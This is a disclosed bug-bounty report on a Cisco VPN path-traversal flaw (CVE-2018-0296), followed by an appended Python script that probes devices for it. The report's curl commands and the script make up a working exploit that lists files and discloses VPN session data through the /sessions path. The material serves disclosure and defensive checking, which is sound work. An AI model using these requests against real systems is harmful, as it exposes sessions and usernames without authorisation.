[CVE-2018-0296] Cisco VPN path traversal on the https://1████████ (https://████████.███.████████/)

Disclosed: 2024-07-19 14:22:33 By sp1d3rs To deptofdefense
Medium
Vulnerability Details
## Description

I discovered a previously unidentified instance https://1███████ in the ████████ network, vulnerable to CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296).

## POC

```
curl -i -k "https://1████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```

████████

We can disclose user sessions by querying /sessions:

```
curl -i -k "https://1█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```

## Suggested fix

Updating to the latest version should fix the issue. The fixed version should give a 404 "File not found" error. Example of a patched version:

```
curl -i -k "https://███.████.█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```

## Impact

Path traversal, which can allow an unauthenticated attacker to disclose sensitive information such as VPN sessions, files and usernames. Under some conditions it is possible to cause DoS.
Report Stats
  • Report ID: 694861
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
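The two curl probes above hinge on one detail that is easy to lose when the check is scripted: the `..` segment must reach the Cisco device unnormalised, which is what `--path-as-is` guarantees. The following Python probe is an added example, not part of sp1d3rs' report or any Cisco code. It builds the same request paths, sends them with `http.client` (which, unlike `requests`/urllib3, does not strip dot segments), and classifies the answer using the behaviour the report describes: a patched device answers 404 "File not found", a vulnerable one answers 200 with JSON. The hostname `vpn.example.test`, the `send_probe` helper and the assumption that any JSON body on a 200 means the listing was served are mine, not from the report.

```python
"""Probe helper for the CVE-2018-0296 file_list.json traversal (added example).

Assumptions (not from the report): the device listens on 443, a vulnerable
build returns HTTP 200 with a JSON body for the traversal path, and a patched
build returns 404 as the report's "Example of a patched version" shows.
"""
import http.client
import json
import ssl

# Traversal path exactly as used in the report's curl commands.
TRAVERSAL_PATH = "/+CSCOU+/../+CSCOE+/files/file_list.json"


def probe_path(target_dir=None):
    """Request path, optionally with the ?path= query (e.g. /sessions)."""
    if target_dir is None:
        return TRAVERSAL_PATH
    return f"{TRAVERSAL_PATH}?path={target_dir}"


def build_raw_request(host, target_dir=None):
    """Raw HTTP/1.1 request bytes, with '..' kept in the request line.

    This is what curl --path-as-is puts on the wire; a client that resolves
    dot segments first would request /+CSCOE+/files/file_list.json and the
    traversal would never be exercised.
    """
    return (
        f"GET {probe_path(target_dir)} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def classify(status, body):
    """Map (status code, body) to 'vulnerable', 'patched' or 'inconclusive'.

    404 matches the patched behaviour the report documents. A 200 with a JSON
    body is treated as the directory listing being served (assumption: the
    exact JSON shape is not checked). Anything else is left inconclusive
    rather than guessed.
    """
    if status == 404:
        return "patched"
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "inconclusive"
        if isinstance(data, (list, dict)):
            return "vulnerable"
    return "inconclusive"


def send_probe(host, target_dir=None, timeout=10):
    """Live check against one host (network; not exercised offline).

    http.client sends the path verbatim, so the '..' survives. Certificate
    verification is disabled to mirror curl -k, since these devices usually
    present self-signed certificates.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # equivalent of curl -k (assumption: lab use only)
    conn = http.client.HTTPSConnection(host, 443, timeout=timeout, context=ctx)
    try:
        conn.request("GET", probe_path(target_dir), headers={"Host": host})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        return classify(resp.status, body)
    finally:
        conn.close()


if __name__ == "__main__":
    # Offline demonstration with constructed responses; replace with
    # send_probe("vpn.example.test", "/sessions") for a live check.
    print(build_raw_request("vpn.example.test", "/sessions").decode())
    print(classify(404, "File not found"))            # patched
    print(classify(200, '[{"path": "/sessions"}]'))   # vulnerable
```

Run `classify` over the raw responses you already captured with `curl -i`, or call `send_probe` against a host you are authorised to test; a result of `inconclusive` (for example a 200 HTML login page) means the check hit something other than the file-list handler and should not be reported as either outcome.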